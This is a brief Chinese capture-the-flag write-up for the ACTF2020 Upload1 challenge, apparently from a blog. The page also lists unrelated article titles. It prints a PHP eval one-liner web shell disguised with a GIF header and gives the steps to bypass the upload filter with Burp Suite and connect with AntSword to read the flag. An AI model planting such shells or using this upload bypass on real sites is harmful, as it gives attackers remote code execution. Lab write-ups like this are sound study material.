1、点开题目链接,页面显示如下,上传test.jpg里面包含一句话木马
GIF89a? <script language="php">eval($_REQUEST[1])</script>
2、使用bp抓包修改后缀,点击发送
3、不关浏览器的代理,在bp中将该包放行
4、用蚁剑连接
5、在根目录中找到flag
[ACTF2020 新生赛]Upload1
不拿flag不改名2024-09-12 13:20
相关推荐
a3158238069 小时前
Android Framework开发知识点整理k***82519 小时前
图文详述:MySQL的下载、安装、配置、使用小七有话说10 小时前
DevUI与企业级中后台系统融合:低代码表单构建器实战暗碳10 小时前
安卓abx二进制xml文件转换普通xml文件4z3311 小时前
Android15 Framework(3):系统服务进程 SystemServer 解析没有了遇见11 小时前
Android 之Google Play bundletool 校验 AAB包yuanhello12 小时前
【Android】Android的键值对存储方案对比Ditglu.12 小时前
CentOS7 MySQL5.7 主从复制最终版搭建流程(避坑完整版)恋猫de小郭12 小时前
Android Studio Otter 2 Feature 发布,最值得更新的 Android Studio走在路上的菜鸟12 小时前
Android学Dart学习笔记第十二节 函数